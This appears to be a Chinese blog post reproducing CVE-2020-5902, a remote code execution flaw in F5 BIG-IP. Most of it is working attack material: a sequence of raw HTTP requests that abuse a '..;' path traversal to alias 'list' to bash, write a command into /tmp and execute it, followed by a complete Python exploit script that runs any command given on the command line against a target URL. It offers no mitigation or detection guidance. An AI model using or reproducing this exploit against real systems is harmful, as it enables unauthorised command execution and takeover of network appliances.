CVE-2020-5902 BIG-IP RCE漏洞复现

释放双眼,带上耳机,听听看~!
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 37

command=delete+cli+alias+private+list
-------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 50

command=create+cli+alias+private+list+command+bash
-------------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 33

content=id&fileName=%2Ftmp%2Fqqweqwe
------------------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 26

command=list+%2Ftmp%2Fqqweqwe
-------------------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 37

command=delete+cli+alias+private+list
为了不这么麻烦。弄了一个python
import requests,sys
def exp(url,cmd):
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080',
    }
    burp0_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
    burp0_cookies = {"JSESSIONID": "41C2740D9D716832E72D7F00BDE3CFA3"}
    burp0_headers = {"Connection": "close", "Cache-Control": "max-age=0", "DNT": "1", "Upgrade-Insecure-Requests": "1",
                     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1",
                     "Sec-Fetch-Dest": "document", "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
                     "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"command": "create cli alias private list command bash"}
    burp_data = {"command": "delete cli alias private list"}
    burpq_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
    burpq_data = {"fileName": "/tmp/qwerty", "content": cmd}
    try:
        c = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp_data, proxies=proxies,
                          verify=False)
        b = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, proxies=proxies,
                          verify=False)
        requests.post(burpq_url, headers=burp0_headers, cookies=burp0_cookies, data=burpq_data, proxies=proxies,
                      verify=False)
        print(url)
        print(b.content)
    except:
        return
    burp1_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
    burp1_data = {"command": "list /tmp/qwerty"}
    try:
        a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp1_data, proxies=proxies,
                          verify=False)
        requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp_data, proxies=proxies,
                      verify=False)
        print(a.content)
    except:
        return

if __name__ == "__main__":
    try:
        args=sys.argv[1]
        cmd=sys.argv[2]
        if args[-1]=='/':args=args[0:-1]
        exp(url=args,cmd=cmd)
    except:
        print('python f5_rce.py https://127.0.0.1 whoami')
运行方式
python f5_rce.py http://127.0.0.1 whoami

人已赞赏
系统提权网络安全

日常渗透测试搞站记录

2020-7-26 9:27:03

营销裂变

淘宝运营商每天做什么?你包括哪些方面?

2019-11-1 23:54:05

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索